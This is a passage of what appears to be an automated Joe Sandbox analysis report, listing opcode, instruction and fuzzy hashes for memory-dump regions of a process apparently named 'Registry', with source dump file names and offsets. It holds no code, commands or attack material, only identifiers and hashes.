                  • Instruction Fuzzy Hash: 9451B330D0E68A9FEB95EF3888292F97BE1FF65351F0505BAD40CC61D2DB28A944C746
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dcc06f7efa41930d51d22d81c3d3f1399e5ed984d1f97db286133b83a4937e66
                  • Instruction ID: 99406ec077e07125042cb5797191fa45cd3836a3275339bbcbecc429fead10a1
                  • Opcode Fuzzy Hash: dcc06f7efa41930d51d22d81c3d3f1399e5ed984d1f97db286133b83a4937e66
                  • Instruction Fuzzy Hash: 7C511474D0C6198FEB65EBA8C4946EDBBB1EF59341F50013AD009EB2D2EB38A944CB14
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: db5ae6bb7032790b4359701e95c7871d638a9a3178d1ca8b1ead68e8ea9fae7a
                  • Instruction ID: f69ac59aa9e1733c1b3d5fcfc2fe3afc4ab17b518df558fcabd9a7931880c82c
                  • Opcode Fuzzy Hash: db5ae6bb7032790b4359701e95c7871d638a9a3178d1ca8b1ead68e8ea9fae7a
                  • Instruction Fuzzy Hash: D451E130D0D68A9FEB89EF2884596B97BE1FFA9341F0404BAD40DC71D2DB38A944C756
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1f201b6b6c4fb925f160123661e955a2414c05bff37d0878437e6876e7e6d152
                  • Instruction ID: 8d94a753372b11a78c2ea1f0dd438b0116e9ac2d47053275666fe665cad9c47d
                  • Opcode Fuzzy Hash: 1f201b6b6c4fb925f160123661e955a2414c05bff37d0878437e6876e7e6d152
                  • Instruction Fuzzy Hash: FD515E74C0D5298EEB65BB5488517FC76B0FF46350F5042BAD48E962C2EF782988CB68
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb2331a185b09938d39b76d14877010fcb81e1cf50406dcf1b9c47062d6622d9
                  • Instruction ID: 473c8929b277089f9619c719d49ee57355e0582a8639a0cf0c044e7d5f9a940d
                  • Opcode Fuzzy Hash: eb2331a185b09938d39b76d14877010fcb81e1cf50406dcf1b9c47062d6622d9
                  • Instruction Fuzzy Hash: 8F41D870D1895D9FEF94EBA8D899BACBBF1FF58341F50016AD00DE7296DB3468818B40
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3966c5ce9709dc978978698a4f7e40759557249de756daae5f1183b1f9c822c7
                  • Instruction ID: 614602897a15be6896e09fc214290cb099b8c4678be627874aa6dbe0e33e0ce1
                  • Opcode Fuzzy Hash: 3966c5ce9709dc978978698a4f7e40759557249de756daae5f1183b1f9c822c7
                  • Instruction Fuzzy Hash: D831B03690E6569FEB55BBACA4551FD3B60EF523A5F040277D508CA0C3FF2C244582AD
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 95b00868f8dc758853699d667be0cce1ac01159510799ba2b441e815531222a9
                  • Instruction ID: bafa9d23c77f8a92aa6989ba6a4df642e992f8efdb8e2ded467eadbee17c025e
                  • Opcode Fuzzy Hash: 95b00868f8dc758853699d667be0cce1ac01159510799ba2b441e815531222a9
                  • Instruction Fuzzy Hash: AA31E1B2D0D98A9FE741FB7858581E97BE0FF66352F0804BAC408CB1D2FF2458858359
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dc6ae5baaecad52ba4421025c6e94b38b5cd3ff60c608e3f58d4e2cacafe44c5
                  • Instruction ID: 8f07624e8811ca1f1b886249330173c477f17b02f4c459c06218bbb1d6feb696
                  • Opcode Fuzzy Hash: dc6ae5baaecad52ba4421025c6e94b38b5cd3ff60c608e3f58d4e2cacafe44c5
                  • Instruction Fuzzy Hash: 1231D335E1C91D9EEB94EB989895AFCB7B1FF6A340F501139D00DE3282EF2468429B44
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fdef6cfca83d346d47142a17b3689dc67796afbe84a3a6a215883f0ad77cfc5
                  • Instruction ID: 990419ee4c0ec89d3b7cc17926c36df57d04c38eda7e1ce219f60aaeb887a98d
                  • Opcode Fuzzy Hash: 3fdef6cfca83d346d47142a17b3689dc67796afbe84a3a6a215883f0ad77cfc5
                  • Instruction Fuzzy Hash: F221F830E1D91D8FDB94FBA89895AECB7B1FF5A340F50112AD00DE7282EF2568419744
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f315ba2faaeed2d1f8e6be440b17a78deb88264f04bd4bec8853c4ab07cb7c7f
                  • Instruction ID: 6360b3b52447de07407dac9f663611e3cdf8fae0852e0cc618c4eb9d4500f62a
                  • Opcode Fuzzy Hash: f315ba2faaeed2d1f8e6be440b17a78deb88264f04bd4bec8853c4ab07cb7c7f
                  • Instruction Fuzzy Hash: 8731C531C0E68A9FEB99EF2484292B93AE1FF65345F0401BAD80CC21D2DB385954C746
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f9d75687945563126a98e17ce64ff80f0a290eae093baf15f3e5a605b778757
                  • Instruction ID: 751fb966edb7b2e370acc78dcd09543a3c2cadd784d28ca3f8474d6798d2d947
                  • Opcode Fuzzy Hash: 4f9d75687945563126a98e17ce64ff80f0a290eae093baf15f3e5a605b778757
                  • Instruction Fuzzy Hash: 7E310670D1952E9EEB94EF94C8447ECB6F1FF59341F1041BAD00DE2291EB7869848F58
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 77ca7a8c7fb10d937790b5764d70b974cee83f232ae3f15953a98b6743526649
                  • Instruction ID: eff79277f09a42d270c3aee4628101fdfad389d5ea47d70b0e7569b4742ecd92
                  • Opcode Fuzzy Hash: 77ca7a8c7fb10d937790b5764d70b974cee83f232ae3f15953a98b6743526649
                  • Instruction Fuzzy Hash: 1D217A3091D79E8FEB95BB24C8182BA7BE1FF56350F0505BAD808C71D2EB78A944C745
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d442419431e55443d9a84bc40ec0ec79b5201febdd3aaf490ab42c2362a6b91d
                  • Instruction ID: b759bdc3085c74186bfb9ecd4c608b2d8d0dd5ca8353a8e75057113f0c40fdfb
                  • Opcode Fuzzy Hash: d442419431e55443d9a84bc40ec0ec79b5201febdd3aaf490ab42c2362a6b91d
                  • Instruction Fuzzy Hash: 7C21D130D0D58A8FF742B7B884592B97BE1EF46380F0444BAD41DC70D2EF38A8858325
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64b8e4785dd19d2cfc45b24faf610ebf3c1049e02f3179e191279de99e16e7c4
                  • Instruction ID: 00b8751a005fb34dffedf7b1dd06272f1fe49e248467efaad6cc7c9d9f6ab3c9
                  • Opcode Fuzzy Hash: 64b8e4785dd19d2cfc45b24faf610ebf3c1049e02f3179e191279de99e16e7c4
                  • Instruction Fuzzy Hash: 37310470D0C5298EEBA5EB54C8557FDB2B0AF56340F4040BAD44DA62D2EF782A88CF18
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3dc06a81d8fb81bd22b508069ba1cc1a16d55451f5f5864cae09a47fc7da7a4e
                  • Instruction ID: 858e26a5832b7a87f3aec7064f494f2e574db4db9b5915b83d867f1920aab0d2
                  • Opcode Fuzzy Hash: 3dc06a81d8fb81bd22b508069ba1cc1a16d55451f5f5864cae09a47fc7da7a4e
                  • Instruction Fuzzy Hash: 4C214D7091864D8FDB85EF28C489AF97BF0FF2D305F01056AE80AC7291EB34A491CB40
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 82e1b7b200a9db440d11dec8de43e92509f2e01ca924f2fa1f56fcdcd39a427d
                  • Instruction ID: 3a0a4bd0c8eb3cd74b017aa68ff1cf30749dc96c42d4647473d9d2cbcd36efb3
                  • Opcode Fuzzy Hash: 82e1b7b200a9db440d11dec8de43e92509f2e01ca924f2fa1f56fcdcd39a427d
                  • Instruction Fuzzy Hash: 1D115830D0D54E9EE780FB68C8496BA7BA0FF9A385F4045B6D809D61D2EF38A5448744
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e8b206853fb3125206fb415520f13821aa18ad2cbc09276154b8d85cfce39a50
                  • Instruction ID: 9895e6521248dfc4181523b645c92443ce9b2cb8c141c3d4541ee2649923ef17
                  • Opcode Fuzzy Hash: e8b206853fb3125206fb415520f13821aa18ad2cbc09276154b8d85cfce39a50
                  • Instruction Fuzzy Hash: 8621813094D68A4FD742EBB888595A97FF4EF4B310F0945EBD449CB0A2EB389449CB21
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fafb6184b14a00e7c0717a82b36191fd38ca1b3a0c19dd8c4cf69e17d04da7c
                  • Instruction ID: 7c07646d89e57adb6aba35e2986cefd83113327000175c3abc17169ad806a305
                  • Opcode Fuzzy Hash: 3fafb6184b14a00e7c0717a82b36191fd38ca1b3a0c19dd8c4cf69e17d04da7c
                  • Instruction Fuzzy Hash: 2A11BF70D0D64A8FEB59EF6888696B97BE0FF5A351F0000BAD40AC61D2FF246484C720
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f00f459d398ff4ee7cd442618063b08522732b028ef5501a313114ba2589426b
                  • Instruction ID: c85bb79cf7f352a86f9f9c9b2e3e02d3b4aceeac899ded5aed0be2a45267e341
                  • Opcode Fuzzy Hash: f00f459d398ff4ee7cd442618063b08522732b028ef5501a313114ba2589426b
                  • Instruction Fuzzy Hash: FC116D3080E68D8FEB46EB6488691BA7BB1FF1A341F0405BBE409D71D2EF345850C754
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 642e3c9cac45c4586d4a185c2db6583a5160bfa7cb5409ab2198a7cb8c0e8c6b
                  • Instruction ID: 700d107417fff01a1c2215e0dc763684d8bcfc017b6345b0637e2a329591961d
                  • Opcode Fuzzy Hash: 642e3c9cac45c4586d4a185c2db6583a5160bfa7cb5409ab2198a7cb8c0e8c6b
                  • Instruction Fuzzy Hash: 0C115B3091964E8FEB89EF28C8992BDBBE0FF29341F4009BAD419C6191EB75A550C704
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dfd23def3570cde61dac84235c09a89e5e867ef9d25ac4ca5a659fb8d498aaa8
                  • Instruction ID: 3d5d5dff85e7e1ee01ef8d87b1f74b57be942c7348dc5a1e5321e7d4520df6b9
                  • Opcode Fuzzy Hash: dfd23def3570cde61dac84235c09a89e5e867ef9d25ac4ca5a659fb8d498aaa8
                  • Instruction Fuzzy Hash: 63117070D1C54E8FEB95FF6884595B9BBA0FF19341F0004BAD41AC21D1EF34A5408704
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8319f51bf73fffd6e69ae14fa55d2872cbf45c7dc8fe3f01156531c607d84c31
                  • Instruction ID: fc113d039c00ff4badb71566d2456c4f69d5dfa1913b40d615c4c62b3f5c058d
                  • Opcode Fuzzy Hash: 8319f51bf73fffd6e69ae14fa55d2872cbf45c7dc8fe3f01156531c607d84c31
                  • Instruction Fuzzy Hash: C701DF3091C64E8FE752FB6488482B97BE0FF1A382F4505B6D808C31E6FB34E0408710
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 229bf6880a69ab69fce853015f8a780347f93a79dd598caf5c377d1f9887fa98
                  • Instruction ID: 1f793f9d5b0b574d655bb8b5ca8ce3df0fd9d91a3660cb2c6032ef0f5caff6be
                  • Opcode Fuzzy Hash: 229bf6880a69ab69fce853015f8a780347f93a79dd598caf5c377d1f9887fa98
                  • Instruction Fuzzy Hash: 6A018C3090990E8FDB58EF24C0596B977A1FF5A345F10447EE40EC21D1EB31A590CB44
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2289de600dd08e2926e71f5047a2b50ff0041560397b94d402c24bb05ab428b7
                  • Instruction ID: 66a179db6dfdbc9c0665d75f9e022ab75045b5bb89c531df9a3c3d903119629e
                  • Opcode Fuzzy Hash: 2289de600dd08e2926e71f5047a2b50ff0041560397b94d402c24bb05ab428b7
                  • Instruction Fuzzy Hash: 1511F831A0826E8EDB64EB54D854BFDB3B5EB54340F0055BAD40DA7281DB386994CB44
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ed007fec0231e5c8c5bc192bc7fc495cb8dddc751035174daa8aef0f02f29aa
                  • Instruction ID: d7582b679c46166c862f08f52d798a843b8902e12edf33cb83ff03b3090c28d3
                  • Opcode Fuzzy Hash: 6ed007fec0231e5c8c5bc192bc7fc495cb8dddc751035174daa8aef0f02f29aa
                  • Instruction Fuzzy Hash: 92014C3090994E8EEB88FF6884592BE7AE0FF19341F10047AD81AD21D1EB75A590C744
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction ID: e22e982972602e29607d5bfc399560a8d7e76e9f9bdf249856d777e4ec8590ac
                  • Opcode Fuzzy Hash: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction Fuzzy Hash: 6311C570D1850ACFDB54EF94D484AEDB7F2EF59350F20452AE419A62D1EB3868908B44
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58e6c9c251a993a93aa1fb3aed0bd41134b2232702df128f578ca045eab48a09
                  • Instruction ID: 57ac687a3996306db7e25758a6557f4446b396e27ad5db997f07a2ec21372914
                  • Opcode Fuzzy Hash: 58e6c9c251a993a93aa1fb3aed0bd41134b2232702df128f578ca045eab48a09
                  • Instruction Fuzzy Hash: 5A017C3190C64E8FE792FBA484496B97BE0FF5A341F4545B6D408C70A2EF38E584D714
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 57a7882267bc55b1b309d3209aef8d166f1d79f3eeed87dc45d4d6488c83653e
                  • Instruction ID: 83803835eda9ad20c55a38b997220df97a021de8d1081b40a40db267c29bc08c
                  • Opcode Fuzzy Hash: 57a7882267bc55b1b309d3209aef8d166f1d79f3eeed87dc45d4d6488c83653e
                  • Instruction Fuzzy Hash: 32018F7194D6899FE742BB7888591A97FE1EF1A340F0505F2D409C70E2FB28A4848711
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea49755c894d5a40d9bc05e97fee6ce7d995534aa3e34c0434ee67dd9e58b1e7
                  • Instruction ID: 6647a06ce78cae697fdeacce115079dedcb98d928b1dd983b23b111c8ef7b2de
                  • Opcode Fuzzy Hash: ea49755c894d5a40d9bc05e97fee6ce7d995534aa3e34c0434ee67dd9e58b1e7
                  • Instruction Fuzzy Hash: DF017131A0D6894FE752B77488596A97BE0EF5A381F0545B6D409CB0E6EF38A4448711
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 52fe682f4383b6da3e5f50853b96d174b65688159be1bb289c4fda968de5d708
                  • Instruction ID: 0af0666dfc8ca1b2e3b9732532ba13beb2945faf87bc1308ad0b013c82878b26
                  • Opcode Fuzzy Hash: 52fe682f4383b6da3e5f50853b96d174b65688159be1bb289c4fda968de5d708
                  • Instruction Fuzzy Hash: 7701813080EA8D8FDB99EF2484556B97BA1EF56341F5400BAE808C61D2EB75D494C740
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c84daf09ba0ff0d51b0811aa1a3211c873624102d018639787290722caf568c
                  • Instruction ID: e99e19425bc0ff51f0fac5202762d57bdb14ed371c897cbd83fcbd3410f38aae
                  • Opcode Fuzzy Hash: 9c84daf09ba0ff0d51b0811aa1a3211c873624102d018639787290722caf568c
                  • Instruction Fuzzy Hash: C101AD3481860E9EEB4AEB6484086BA77E0FF19345F20047FD80EC21D1EF35A594C720
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 374672f808d4267e241b3a820f1841bdb99fe0c4a10d95971a85ce1c8cf6214b
                  • Instruction ID: f3baf0f0c95a8ee4ead8ca403870dd89ed762f9069c574f5ec28e56c4930be09
                  • Opcode Fuzzy Hash: 374672f808d4267e241b3a820f1841bdb99fe0c4a10d95971a85ce1c8cf6214b
                  • Instruction Fuzzy Hash: C5016934818A0E9EEB5AEB6480582BA77E0FF19345F6008BFE40EC21D1EF35A590C614
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: edce84702d84775aaccfce39c23007f91340cb31a28b8f2f95ffaecf68b5bde5
                  • Instruction ID: 903ec7aee5941ac68565c1e07a9fa12adaac685ee7ad93f399308d8c7e60d2d7
                  • Opcode Fuzzy Hash: edce84702d84775aaccfce39c23007f91340cb31a28b8f2f95ffaecf68b5bde5
                  • Instruction Fuzzy Hash: 5AF0AF70D0E65B8EFB99BF6898183FA77E4FF56354F00017AE819C20C1FF2415908660
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction ID: d8232beb7212df2157eb4c5f4da9b388c77737c7f385db8797068b7092e3edd4
                  • Opcode Fuzzy Hash: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction Fuzzy Hash: AF019070D1C10ACFDB18EF94D490AFDB7F2EF59350F20452AE409A22D1EB386990CB98
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69d06eb25b9f6594013509aea5d2acec294a076ca65be14cc6a952305c9e4e78
                  • Instruction ID: 42c98026098ae82bbfda1b6ba0c4d54e36cbe7f585fab460f854e261f89570e7
                  • Opcode Fuzzy Hash: 69d06eb25b9f6594013509aea5d2acec294a076ca65be14cc6a952305c9e4e78
                  • Instruction Fuzzy Hash: 89F02835D0D68A8EEF99AF3858252B93AE1FFB5344F0404FED80CC20C2DF285854C60A
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 631c8664641249616ca672e24a009e8e21ef8a889979160d49e62c247917f629
                  • Instruction ID: f5b97ba71443ad1a2f58bb94f7c0bd4aec385e33def142141f0a038e6831e7ed
                  • Opcode Fuzzy Hash: 631c8664641249616ca672e24a009e8e21ef8a889979160d49e62c247917f629
                  • Instruction Fuzzy Hash: 11F0623081EA4E8FEB54EF2494156FA77A4EF16348F50057AE80DC21D1EB35A594C784
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d523bc3793aed282fc520e476c3737614a636fe80f6befc3dc3356357528d8c6
                  • Instruction ID: f15a8ce6a100b56a9bb40cadbc13dbfadb2a0910dcdea027c192b918916f8889
                  • Opcode Fuzzy Hash: d523bc3793aed282fc520e476c3737614a636fe80f6befc3dc3356357528d8c6
                  • Instruction Fuzzy Hash: CEF01431A0866D8FDB54EF94D894AED73B1EB54351F0045A6C80DEB281EB34A9948B80
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2606fc63b337c4372c008265cbd4ce7ec4a4e914c672f1ad98254ca9aade7b6f
                  • Instruction ID: 24daadde2f48648949a72bf8e9991360bae9e21af6b640e6bc31067c6c295dc9
                  • Opcode Fuzzy Hash: 2606fc63b337c4372c008265cbd4ce7ec4a4e914c672f1ad98254ca9aade7b6f
                  • Instruction Fuzzy Hash: F8F0C23480E78E8FD75AAB3088681B93FA0FF16201F4504FBD408C60D2EB389448C751
                  Memory Dump Source
